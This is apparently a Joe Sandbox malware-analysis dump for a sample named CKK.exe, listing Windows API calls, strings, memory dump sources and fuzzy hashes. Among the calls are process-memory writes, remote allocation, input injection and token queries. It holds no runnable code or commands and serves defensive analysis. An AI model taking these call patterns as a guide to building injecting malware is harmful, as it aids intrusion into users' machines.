                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 2d4d0de93ead581d67fed9c760db22bc915cd0da44522163cc3e24a8fe00e94a
                                          • Instruction ID: 19c694f109b8a64850f39f713806696a292162cfa5efd4de4476ca35cfdaec15
                                          • Opcode Fuzzy Hash: 2d4d0de93ead581d67fed9c760db22bc915cd0da44522163cc3e24a8fe00e94a
                                          • Instruction Fuzzy Hash: 2D01F4326056017BCA1327357C45D6B2699EBC57A9B34E12DFA2DB22D7EF608C455120
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00EAE997
                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00EAE9A5
                                          • Sleep.KERNEL32(00000000), ref: 00EAE9AD
                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00EAE9B7
                                          • Sleep.KERNEL32 ref: 00EAE9F3
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EA1114
                                          • GetLastError.KERNEL32 ref: 00EA1120
                                          • GetProcessHeap.KERNEL32 ref: 00EA112F
                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EA0B9B,?,?,?), ref: 00EA1136
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EA114D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetTokenInformation.ADVAPI32 ref: 00EA0FCA
                                          • GetLastError.KERNEL32 ref: 00EA0FD6
                                          • GetProcessHeap.KERNEL32 ref: 00EA0FE5
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00EA0FEC
                                          • GetTokenInformation.ADVAPI32 ref: 00EA1002
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetTokenInformation.ADVAPI32 ref: 00EA102A
                                          • GetLastError.KERNEL32 ref: 00EA1036
                                          • GetProcessHeap.KERNEL32 ref: 00EA1045
                                          • HeapAlloc.KERNEL32(00000000,?,00000003,?,00000000,?), ref: 00EA104C
                                          • GetTokenInformation.ADVAPI32 ref: 00EA1062
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 00E7D752
                                            • Part of subcall function 00E729C8: HeapFree.KERNEL32(00000000,00000000), ref: 00E729DE
                                            • Part of subcall function 00E729C8: GetLastError.KERNEL32 ref: 00E729F0
                                          • _free.LIBCMT ref: 00E7D764
                                          • _free.LIBCMT ref: 00E7D776
                                          • _free.LIBCMT ref: 00E7D788
                                          • _free.LIBCMT ref: 00E7D79A
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • _free.LIBCMT ref: 00E722BE
                                            • Part of subcall function 00E729C8: HeapFree.KERNEL32(00000000,00000000), ref: 00E729DE
                                            • Part of subcall function 00E729C8: GetLastError.KERNEL32 ref: 00E729F0
                                          • _free.LIBCMT ref: 00E722D0
                                          • _free.LIBCMT ref: 00E722E3
                                          • _free.LIBCMT ref: 00E722F4
                                          • _free.LIBCMT ref: 00E72305
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: __freea$_free
                                          • String ID: a/p$am/pm
                                          • API String ID: 3432400110-3206640213
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?), ref: 00E78B6E
                                          • GetLastError.KERNEL32 ref: 00E78B7A
                                          • __dosmaperr.LIBCMT ref: 00E78B81
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                          • String ID: .
                                          • API String ID: 2434981716-3963672497
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EAB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000), ref: 00EAB42D
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EA2760
                                            • Part of subcall function 00EAB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000), ref: 00EAB3F8
                                            • Part of subcall function 00EAB32A: GetWindowThreadProcessId.USER32(?,?), ref: 00EAB355
                                            • Part of subcall function 00EAB32A: OpenProcess.KERNEL32(00000438,00000000,?), ref: 00EAB365
                                            • Part of subcall function 00EAB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00EAB37B
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EA27CD
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EA281A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _free$FileModuleName
                                          • String ID: C:\Users\user\AppData\Roaming\CKK.exe
                                          • API String ID: 2506810119-112244442
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem
                                          • String ID: 0
                                          • API String ID: 135850232-4108050209
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00ED44AA
                                          • GetWindowLongW.USER32 ref: 00ED44C7
                                          • SetWindowLongW.USER32 ref: 00ED44D7
                                          Strings
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: Variant$AllocClearCopyString
                                          • String ID: *j
                                          • API String ID: 2173805711-1845181700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EC335B: WideCharToMultiByte.KERNEL32 ref: 00EC3378
                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EC307A
                                          • _wcslen.LIBCMT ref: 00EC309B
                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 00EC3106
                                          Strings
                                          Similarity
                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 946324512-2422070025
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00ED4705
                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00ED4713
                                          • DestroyWindow.USER32 ref: 00ED471A
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 4014797782-2298589950
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _wcslen
                                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                          • API String ID: 176396367-2734436370
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00ED3840
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00ED3850
                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00ED3876
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB4A08
                                          • GetVolumeInformationW.KERNEL32 ref: 00EB4A5C
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB4AD0
                                          Strings
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume
                                          • String ID: %lu
                                          • API String ID: 2507767853-685833217
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00ED424F
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00ED4264
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00ED4271
                                          Strings
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E46B57: _wcslen.LIBCMT ref: 00E46B6A
                                            • Part of subcall function 00EA2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EA2DC5
                                            • Part of subcall function 00EA2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA2DD6
                                            • Part of subcall function 00EA2DA7: GetCurrentThreadId.KERNEL32 ref: 00EA2DDD
                                            • Part of subcall function 00EA2DA7: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA2DE4
                                          • GetFocus.USER32 ref: 00EA2F78
                                            • Part of subcall function 00EA2DEE: GetParent.USER32(00000000), ref: 00EA2DF9
                                          • GetClassNameW.USER32(?,?,00000100), ref: 00EA2FC3
                                          • EnumChildWindows.USER32 ref: 00EA2FEB
                                          Strings
                                          Similarity
                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                          • String ID: %s%d
                                          • API String ID: 1272988791-1110647743
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: Menu$InfoItem$Draw
                                          • String ID: 0
                                          • API String ID: 3227129158-4108050209
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: AddressFreeLibraryProc
                                          • String ID: GetSystemWow64DirectoryW$X64
                                          • API String ID: 3013587201-2590602151
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Similarity
                                          • API ID: Variant$ClearInitInitializeUninitialize
                                          • String ID:
                                          • API String ID: 1998397398-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • GetWindowRect.USER32(01115280,?), ref: 00ED62E2
                                          • ScreenToClient.USER32(?,?), ref: 00ED6315
                                          • MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00ED6382
                                          Similarity
                                          • API ID: Window$ClientMoveRectScreen
                                          • String ID:
                                          • API String ID: 3880355969-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EB5783
                                          • GetLastError.KERNEL32 ref: 00EB57A9
                                          • DeleteFileW.KERNEL32 ref: 00EB57CE
                                          • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EB57FA
                                          Similarity
                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                          • String ID:
                                          • API String ID: 3321077145-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000), ref: 00E7D910
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E7D999
                                          • GetStringTypeW.KERNEL32 ref: 00E7D9AB
                                          • __freea.LIBCMT ref: 00E7D9B4
                                            • Part of subcall function 00E73820: RtlAllocateHeap.NTDLL(00000000,?,00F11444,?,00E5FDF5,?,?,00E4A976,00000010,00F11440,00E413FC,?,00E413C6,?,00E41129), ref: 00E73852
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                          • String ID:
                                          • API String ID: 2652629310-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00EAABF1
                                          • SetKeyboardState.USER32(00000080), ref: 00EAAC0D
                                          • PostMessageW.USER32 ref: 00EAAC74
                                          • SendInput.USER32(00000001,?,0000001C), ref: 00EAACC6
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00ED16EB
                                            • Part of subcall function 00EA3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EA3A57
                                            • Part of subcall function 00EA3A3D: GetCurrentThreadId.KERNEL32 ref: 00EA3A5E
                                            • Part of subcall function 00EA3A3D: AttachThreadInput.USER32(00000000,?,00000000), ref: 00EA3A65
                                          • GetCaretPos.USER32(?), ref: 00ED16FF
                                          • ClientToScreen.USER32(00000000,?), ref: 00ED174C
                                          • GetForegroundWindow.USER32 ref: 00ED1752
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00EAD501
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00EAD50F
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00EAD52F
                                          • CloseHandle.KERNEL32(00000000), ref: 00EAD5DC
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00E59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E59BB2
                                          • GetCursorPos.USER32(?), ref: 00ED9001
                                          • TrackPopupMenuEx.USER32 ref: 00ED9016
                                          • GetCursorPos.USER32(?), ref: 00ED905E
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E97711,?,?,?), ref: 00ED9094
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 2267087916-0
                                          Uniqueness
                                          • Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA1014: GetTokenInformation.ADVAPI32 ref: 00EA102A
                                            • Part of subcall function 00EA1014: GetLastError.KERNEL32 ref: 00EA1036
                                            • Part of subcall function 00EA1014: GetProcessHeap.KERNEL32 ref: 00EA1045
                                            • Part of subcall function 00EA1014: HeapAlloc.KERNEL32(00000000,?,00000003,?,00000000,?), ref: 00EA104C
                                            • Part of subcall function 00EA1014: GetTokenInformation.ADVAPI32 ref: 00EA1062
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00EA15BE
                                          • _memcmp.LIBVCRUNTIME ref: 00EA15E1
                                          • GetProcessHeap.KERNEL32 ref: 00EA1617
                                          • HeapFree.KERNEL32(00000000), ref: 00EA161E
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: dba0d55ccba0aaa211415d03495aa3ee3d0f557ea974e5f158b0ca3f21f72511
                                          • Instruction ID: a8581ba0c74e7e47cedb82923b4e3e9bff9cbd6b5fe0a3ad20cdd7a3b2490f82
                                          • Opcode Fuzzy Hash: dba0d55ccba0aaa211415d03495aa3ee3d0f557ea974e5f158b0ca3f21f72511
                                          • Instruction Fuzzy Hash: 15218931E41109EFDF00DFA4C945BEEB7B8EF89348F184499E441BB241E730AA49CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00ED280A
                                          • SetWindowLongW.USER32 ref: 00ED2824
                                          • SetWindowLongW.USER32 ref: 00ED2832
                                          • SetLayeredWindowAttributes.USER32 ref: 00ED2840
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: 3dbd81b2739378c329c37e85c5c5b8f3a48459b842d55eceb68ebff4e460638d
                                          • Instruction ID: fc424cb0a44a6c89ea2019a5e362aa31ad4059bb799d4213c33426f16b4ba5b8
                                          • Opcode Fuzzy Hash: 3dbd81b2739378c329c37e85c5c5b8f3a48459b842d55eceb68ebff4e460638d
                                          • Instruction Fuzzy Hash: D6213335205111AFD7149B24D840FAA7B9AEF95324F24924EF526AB3E2C771FC43C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA8D7D: lstrlenW.KERNEL32 ref: 00EA8D8C
                                            • Part of subcall function 00EA8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00EA8DB2
                                            • Part of subcall function 00EA8D7D: lstrcmpiW.KERNEL32 ref: 00EA8DE3
                                          • lstrlenW.KERNEL32 ref: 00EA7923
                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00EA7949
                                          • lstrcmpiW.KERNEL32 ref: 00EA7984
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: a4488862428b507721a39d3a53210cfd8174cb6c64ed36b7c920041820b20769
                                          • Instruction ID: 279e2aa856d7fc945494959a697949fcb21b8fe905f86b0adcddd466422e6562
                                          • Opcode Fuzzy Hash: a4488862428b507721a39d3a53210cfd8174cb6c64ed36b7c920041820b20769
                                          • Instruction Fuzzy Hash: 4411E43A201202AFCB159F35DC45D7B77E9EF8A394B10502BE982DB2A4EB31A811C791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 00ED56BB
                                          • _wcslen.LIBCMT ref: 00ED56CD
                                          • _wcslen.LIBCMT ref: 00ED56D8
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00ED5816
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSend_wcslen
                                          • String ID:
                                          • API String ID: 455545452-0
                                          • Opcode ID: 7d9cb05c3cb832c347efa68f8263423dd266ba43598b0bf44f5b77cf597a5089
                                          • Instruction ID: b7acd16da99bc6ebd977b3b96b9d3852be27e150291961c4a55df286e678c647
                                          • Opcode Fuzzy Hash: 7d9cb05c3cb832c347efa68f8263423dd266ba43598b0bf44f5b77cf597a5089
                                          • Instruction Fuzzy Hash: 98110A7264060996DB209F65DC81AFE37ACEF50764B10502BF926F6281E770C985CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00EAE1FD
                                          • MessageBoxW.USER32 ref: 00EAE230
                                          • WaitForSingleObject.KERNEL32 ref: 00EAE246
                                          • CloseHandle.KERNEL32(00000000), ref: 00EAE24D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                          • String ID:
                                          • API String ID: 2880819207-0
                                          • Opcode ID: daab476b080271b19e84f4b78fb21165fb82e7e694a57adb30fb0f96f2c8aea7
                                          • Instruction ID: cc0bad06e8bedfe9b91f018a894be50991c3ab03f2c24aa2224c502481f8a2e0
                                          • Opcode Fuzzy Hash: daab476b080271b19e84f4b78fb21165fb82e7e694a57adb30fb0f96f2c8aea7
                                          • Instruction Fuzzy Hash: 26110872905259BFC7019BA8AC09BDE7FACEB46354F108256F924F7391D270DD0487B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNEL32(00000000,?,00E6CFF9,00000000,00000004,00000000), ref: 00E6D218
                                          • GetLastError.KERNEL32 ref: 00E6D224
                                          • __dosmaperr.LIBCMT ref: 00E6D22B
                                          • ResumeThread.KERNEL32(00000000), ref: 00E6D249
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
